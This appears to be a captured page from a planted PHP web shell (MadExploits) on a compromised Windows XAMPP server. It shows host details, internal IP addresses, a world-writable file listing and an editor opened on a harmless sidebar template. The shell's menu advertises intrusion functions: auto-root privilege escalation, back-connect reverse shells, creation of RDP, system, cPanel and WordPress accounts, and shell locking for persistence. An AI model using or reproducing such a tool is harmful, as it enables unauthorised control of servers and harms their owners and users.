Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
bak.sql
0
B
-rw-rw-rw-
config.php
6.25
KB
-rw-rw-rw-
external.json
81
B
-rw-rw-rw-
f_start.php
3.26
KB
-rw-rw-rw-
page_footer.php
220
B
-rw-rw-rw-
page_head.php
3.43
KB
-rw-rw-rw-
page_header.php
4.78
KB
-rw-rw-rw-
page_header_200423.php
3.23
KB
-rw-rw-rw-
page_header_230312.php
4.27
KB
-rw-rw-rw-
page_sidebar.php
17.64
KB
-rw-rw-rw-
page_sidebar_alt.php
3.94
KB
-rw-rw-rw-
template_end.php
1.46
KB
-rw-rw-rw-
template_scripts.php
1.43
KB
-rw-rw-rw-
template_scripts_200430.php
657
B
-rw-rw-rw-
template_scripts_notinclude.ph...
2.68
KB
-rw-rw-rw-
template_start.php
16.75
KB
-rw-rw-rw-
template_start_200728.php
8.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page_sidebar_alt.php
<?php /** * page_sidebar_alt.php * * Author: pixelcave * * The alternative sidebar of each page * */ ?> <!-- Alternative Sidebar --> <div id="sidebar-alt" tabindex="-1" aria-hidden="true"> <!-- Toggle Alternative Sidebar Button (visible only in static layout) --> <a href="javascript:void(0)" id="sidebar-alt-close" onclick="App.sidebar('toggle-sidebar-alt');"><i class="fa fa-times"></i></a> <!-- Wrapper for scrolling functionality --> <div id="sidebar-scroll-alt"> <!-- Sidebar Content --> <div class="sidebar-content"> <!-- Profile --> <div class="sidebar-section"> <h2 class="text-light">Profile</h2> <form action="index.php" method="post" class="form-control-borderless" onsubmit="return false;"> <div class="form-group"> <label for="side-profile-name">Name</label> <input type="text" id="side-profile-name" name="side-profile-name" class="form-control" value="John Doe"> </div> <div class="form-group"> <label for="side-profile-email">Email</label> <input type="email" id="side-profile-email" name="side-profile-email" class="form-control" value="john.doe@example.com"> </div> <div class="form-group"> <label for="side-profile-password">New Password</label> <input type="password" id="side-profile-password" name="side-profile-password" class="form-control"> </div> <div class="form-group"> <label for="side-profile-password-confirm">Confirm New Password</label> <input type="password" id="side-profile-password-confirm" name="side-profile-password-confirm" class="form-control"> </div> <div class="form-group remove-margin"> <button type="submit" class="btn btn-effect-ripple btn-primary" onclick="App.sidebar('close-sidebar-alt');">Save</button> </div> </form> </div> <!-- END Profile --> <!-- Settings --> <div class="sidebar-section"> <h2 class="text-light">Settings</h2> <form action="index.php" method="post" class="form-horizontal form-control-borderless" onsubmit="return false;"> <div class="form-group"> <label class="col-xs-7 control-label-fixed">Notifications</label> <div class="col-xs-5"> <label class="switch switch-success"><input type="checkbox" checked><span></span></label> </div> </div> <div class="form-group"> <label class="col-xs-7 control-label-fixed">Public Profile</label> <div class="col-xs-5"> <label class="switch switch-success"><input type="checkbox" checked><span></span></label> </div> </div> <div class="form-group"> <label class="col-xs-7 control-label-fixed">Enable API</label> <div class="col-xs-5"> <label class="switch switch-success"><input type="checkbox"><span></span></label> </div> </div> <div class="form-group remove-margin"> <button type="submit" class="btn btn-effect-ripple btn-primary" onclick="App.sidebar('close-sidebar-alt');">Save</button> </div> </form> </div> <!-- END Settings --> </div> <!-- END Sidebar Content --> </div> <!-- END Wrapper for scrolling functionality --> </div> <!-- END Alternative Sidebar -->
Close